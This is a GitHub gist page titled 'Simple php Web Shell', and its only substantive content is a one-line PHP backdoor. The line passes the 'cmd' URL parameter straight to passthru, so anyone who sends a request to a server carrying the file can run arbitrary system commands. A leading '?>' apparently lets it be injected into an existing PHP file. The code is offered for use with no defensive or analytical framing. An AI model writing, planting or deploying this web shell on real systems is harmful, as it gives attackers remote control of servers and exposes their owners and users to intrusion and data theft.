Skip to content

Instantly share code, notes, and snippets.

@growlnx
Last active May 13, 2019 19:06
Show Gist options
  • Save growlnx/ad7ba253411955ab219b7d088b688829 to your computer and use it in GitHub Desktop.
Save growlnx/ad7ba253411955ab219b7d088b688829 to your computer and use it in GitHub Desktop.
Simple php Web Shell
?><?php (isset($_GET['cmd'])) ? passthru($_GET['cmd']) : echo 'NO CMD'; ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment